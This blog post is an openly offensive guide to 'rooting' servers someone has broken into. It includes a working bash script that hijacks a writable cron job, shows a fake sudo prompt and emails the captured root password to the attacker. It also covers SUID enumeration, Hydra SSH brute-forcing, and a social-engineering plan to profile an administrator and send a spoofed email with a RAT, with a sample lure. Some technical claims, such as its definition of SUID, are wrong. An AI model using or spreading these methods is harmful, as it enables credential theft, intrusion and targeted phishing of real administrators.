Hello to Everyone!
As I told to another Comment of a Post I made, and because a Visitor of this Blog requested it, I will share with you some Methods on How to Root a Server when there isn’t any Local Root Kernel Exploit available!
1 – Looking for Custom Cron Tab Scripts
Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.
First, check out if there are any Cron Job Tasks:
crontab -l
If you see any Custom Script, we must Check out if we can Write on it.
Let’s say we got a Custom script here: /bin/cronscript
To check if we can Write a File, type:
stat /bin/cronscript
(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)
Let’s edit the file and send a Fake Error Message.
Make a Copy of the Original Script to /bin/cronscript.bak:
cp /bin/cronscript /bin/cronscript.bak
Edit the /bin/cronscript like this:
#!/bin/sh
echo “An System Error Occured!”
echo “”
echo “Error Code: #131425″
echo “”
echo “Update to get the Latest Patch for this Security Issue.”
read -s -p “[sudo] password for root ” rootpasswd
echo “”
echo “su: Authentication failure”
echo “”
sudo apt-get update && sudo apt-get upgrade
sudo echo “The Password is: $rootpasswd” > .kod
mail -s “Root’s Password” “email@address.com” < .kod
rm .kod
mv cronscript.bak cronscript
You should just Replace the Underlined with your E-Mail and the Name of the Script!
After you save the File, type: chmod +x cronscript to set it as Executable!
This script will:
- Send a Fake Error Message
- Request for the Root’s Password
- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)
- Restore the Original File
When the Script gets Executed, the Root User will Enter his Password and it will be send to you!
It would be better if you had some knowledge on Bash Programming…
2 – Enumerating all SUID Files
An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you: You can Escalate Priviliges in this way, if it is in an Important Directory.
As before, you can Social-Engineer a Privileged User.
To find all SUID Files, type:
find / -user root -perm -4000 -print
This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!
3 – Private Local Root Exploits
You can find Private Local (or Remote but it is far less common) Root Exploits by searching Google!
I have found Three (!) Private Local Root Exploits on some Kernel Versions I needed.
So, Search search search!
4 – Bruteforcing Passwords
You can also try to Bruteforce the Password of the Root user or other Priviliged Users!
Use the script named “rootdabitch“!
It runs on the Background and sends you the Password if it is Found!
Here is the Website of the Script….
You can also try to Bruteforce it via SSH! If you scan it with NMap and Find an SSH Port Open (Usually 22), you can Use Hydra to Crack the Password and gain Root Access via SSH!
Here is a Video on how to Bruteforce Passwords with Hydra over SSH:
5 – Social-Engineering the Administrator
This method doesn’t Depend on any Hacking Skills but to your Social-Engineering skills and Research Methods!
You can find so many great Books on Social-Engineering on Google. Search!
Follow these Steps:
1. Search on Google, Facebook,Twitter for Friends of the Administrator
2. Find Personal Information about the Admin (Names, Family, Work Location etc…)
3. Find E-Mails, Telephone/Mobile Numbers
4. Create a JavaDriveBy or a RAT
5. Send a Fake-Mail using a Fake-Mailer as a Friend of the Server’s Administrator including an Infected File (with your RAT)
6. The Admin should open the File and you get Root Priviliges!
Example Message:
Hello Bob!
How are you? I just found out something awesome you will surely like!
It is a surprize! It is attached on a PDF File!
Check it out!
See ya!
Bob is the Victim (the Server’s Administrator). Thus, you have to Pretend to be his Friend. You need to research and Find a Close Friend and His E-Mail address so that it doesn’t seem as an Attack!
Summing that Up, These are the Steps you should follow:
- Search for a Public Local Root Kernel Exploit. Here is my own Database: p0sth4x0r.net46.net/
- If you don’t find the Appropriate Exploit, try searching Google for Private Local/Remote Root Kernel Exploits.
- If you don’t find something again, try finding all SUID Files and Writeable Cron Tab Scripts that you can Exploit.
- If you aren’t satisfied with the Result, try to Brute-Force User or Root Passwords with Hydra or rootdabitch.
As you can see, you need to have Imagination, good Research Techniques, Programming Knowledge is Preffered, Unix Knowledge and Social-Engineering! Learn even the most basics of all these, and you will know how to Root Servers in Minutes!